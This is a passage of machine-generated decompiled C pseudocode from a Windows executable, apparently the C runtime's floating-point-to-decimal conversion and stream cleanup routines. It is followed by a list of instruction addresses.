													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00C5AA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00C5AA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xc66a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xc66a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xc66a06 + _t812 * 4) & 0x000000ff) + ( *(0xc66a07 + _t812 * 4) & 0x000000ff);
												E00C4E920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00C4EA80( &(( &_v1396)[_t1097]), 0xc66100 + ( *(0xc66a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xc66a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E00C5AA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00C5AA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00C5AA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0xc66a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xc66a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xc66a06 + _t908 * 4) & 0x000000ff) + ( *(0xc66a07 + _t908 * 4) & 0x000000ff);
												E00C4E920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E00C4EA80( &(( &_v1396)[_t1104]), 0xc66100 + ( *(0xc66a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xc66a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1165 = 0;
														_t1257 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1165;
															_t929 = _t1165 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1213 = _t1212 -  &_v1860;
															__eflags = _t1213;
															_v1928 = _t1213;
															do {
																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1214 = 0;
																	_t1106 = _t1257;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1213 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1165;
																			if(_t1106 == _t1165) {
																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1257;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1214 = _t945 * _v1884 >> 0x20;
																			_t1165 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1214;
																				if(_t1214 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1165;
																					if(_t1106 == _t1165) {
																						_t370 = _t1273 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1214;
																					_t1214 = 0;
																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
																					_t1165 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1257 - _t1165;
																	if(_t1257 == _t1165) {
																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
																		_t338 = _t1257 + 1; // 0x1
																		_t1165 = _t338;
																		_v1864 = _t1165;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1257 = _t1257 + 1;
																__eflags = _t1257 - _t1105;
															} while (_t1257 != _t1105);
															goto L177;
														}
													} else {
														_t1215 = _v932;
														_v936 = _t1105;
														E00C5AA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1215;
														if(_t1215 != 0) {
															__eflags = _t1215 - 1;
															if(_t1215 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1258 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1215;
																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1258 = _t1258 + 1;
																		_t1107 = _t1166;
																		__eflags = _t1258 - _v1884;
																	} while (_t1258 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1216 = _v1396;
													__eflags = _t1216;
													if(_t1216 != 0) {
														__eflags = _t1216 - 1;
														if(_t1216 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1259 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1216;
																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1259 = _t1259 + 1;
																	_t1108 = _t1167;
																	__eflags = _t1259 - _v1884;
																} while (_t1259 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00C5AA64();
																		_t1279 =  &(_t1279[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00C5AA64();
														_t1279 =  &(_t1279[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00C5AA64();
													_t1279 =  &(_t1279[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1196 = _v1920;
									_t1245 = _t1196;
									_t1086 = _v472;
									_v1872 = _t1245;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1249 = 0;
										_t1200 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
											_t1153 = 0xa;
											_t1154 = _t841 * _t1153 >> 0x20;
											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
											asm("adc edx, 0x0");
											_t1200 = _t1200 + 1;
											_t1249 = _t1154;
											__eflags = _t1200 - _t1086;
										} while (_t1200 != _t1086);
										_v1896 = _t1249;
										__eflags = _t1249;
										_t1245 = _v1872;
										if(_t1249 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00C5AA64( &_v468, _t1064,  &_v2404, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
												_v472 = _v472 + 1;
											}
										}
										_t1196 = _t1245;
									}
									_t815 = E00C5C0B0( &_v472,  &_v936);
									_t1146 = 0xa;
									__eflags = _t815 - _t1146;
									if(_t815 != _t1146) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1245 = _t1196 + 1;
											 *_t1196 = _t816;
											_v1872 = _t1245;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1245 = _t1196 + 1;
										_t832 = _v936;
										 *_t1196 = 0x31;
										_v1872 = _t1245;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1199 = 0;
											_t1248 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1199 = _t833 * _t1146 >> 0x20;
												_t1146 = 0xa;
												__eflags = _t1094 - _t1248;
											} while (_t1094 != _t1248);
											_t1245 = _v1872;
											__eflags = _t1199;
											if(_t1199 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00C5AA64( &_v932, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1245 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1197 = 0;
											_t1246 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1246;
											} while (_t1090 != _t1246);
											_t1247 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00C5AA64( &_v468, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E00C5C0B0( &_v472,  &_v936);
											_t1198 = 8;
											_t1070 = _v1916 - _t1247;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1151 = _t708 + 0x30;
												__eflags = _t1070 - _t1198;
												if(_t1070 >= _t1198) {
													 *((char*)(_t1198 + _t1247)) = _t1151;
												}
												_t1198 = _t1198 - 1;
												__eflags = _t1198 - 0xffffffff;
											} while (_t1198 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1245 = _t1247 + _t1070;
											_v1872 = _t1245;
											__eflags = _t1245 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1245 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1236 & 0x000fffff;
					if((_t1188 | _t1236 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xc66ac4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E00C579F6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C57DBB();
							asm("int3");
							E00C4E2F0(_t1142, 0xc6a9e8, 0x10);
							_v32 = _v32 & 0x00000000;
							E00C59931(8);
							_pop(_t1071);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1237 = 3;
							while(1) {
								_v36 = _t1237;
								__eflags = _t1237 -  *0xc90404; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xc90408; // 0x0
								_t764 =  *(_t763 + _t1237 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xc90408; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
										_t774 = E00C5EC83(_t1071, _t1142, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0xc90408; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
									_t770 =  *0xc90408; // 0x0
									E00C57A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
									_pop(_t1071);
									_t772 =  *0xc90408; // 0x0
									_t737 = _t772 + _t1237 * 4;
									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1237 = _t1237 + 1;
							}
							_v8 = 0xfffffffe;
							E00C5D991();
							return E00C4E336(_t1142);
						} else {
							L309:
							_t1286 = _v1936;
							if(_v1936 != 0) {
								_t755 = E00C5DFE5(_t1070, _t1286,  &_v1944);
							}
							return E00C4E203(_t755, _v8 ^ _t1273);
						}
					}
				}
			}































































































































































































































































                                            0x00c5c55e
                                            0x00c5c561
                                            0x00c5c563
                                            0x00c5c569
                                            0x00c5c570
                                            0x00c5c574
                                            0x00c5c57d
                                            0x00c5c57e
                                            0x00c5c57f
                                            0x00c5c582
                                            0x00c5c588
                                            0x00c5c58e
                                            0x00c5c593
                                            0x00c5c5a2
                                            0x00c5c5a4
                                            0x00c5c5a6
                                            0x00c5c5a6
                                            0x00c5c5ad
                                            0x00c5c5b7
                                            0x00c5c5bc
                                            0x00c5c5bf
                                            0x00c5c5e3
                                            0x00c5c5e7
                                            0x00c5c5ec
                                            0x00c5c5ed
                                            0x00c5c5ef
                                            0x00c5c5f1
                                            0x00c5c5f7
                                            0x00c5c5f7
                                            0x00c5c5fe
                                            0x00c5c5fe
                                            0x00c5c601
                                            0x00c5d8b1
                                            0x00000000
                                            0x00c5c607
                                            0x00c5c607
                                            0x00c5c607
                                            0x00c5c60a
                                            0x00c5d8aa
                                            0x00000000
                                            0x00c5c610
                                            0x00c5c610
                                            0x00c5c610
                                            0x00c5c613
                                            0x00c5d8a3
                                            0x00000000
                                            0x00c5c619
                                            0x00c5c619
                                            0x00c5c61c
                                            0x00c5d89c
                                            0x00000000
                                            0x00c5c622
                                            0x00c5c62b
                                            0x00c5c633
                                            0x00c5c636
                                            0x00c5c639
                                            0x00c5c63c
                                            0x00c5c642
                                            0x00c5c64a
                                            0x00c5c650
                                            0x00c5c65a
                                            0x00c5c65a
                                            0x00c5c65d
                                            0x00c5c665
                                            0x00c5c66c
                                            0x00c5c66c
                                            0x00c5c65f
                                            0x00c5c65f
                                            0x00c5c661
                                            0x00c5c674
                                            0x00c5c67a
                                            0x00c5c67c
                                            0x00c5c680
                                            0x00c5c685
                                            0x00c5c692
                                            0x00c5c694
                                            0x00c5c69a
                                            0x00c5c69f
                                            0x00c5c6a0
                                            0x00c5c6a1
                                            0x00c5c6ab
                                            0x00c5c6b0
                                            0x00c5c6b6
                                            0x00c5c6bb
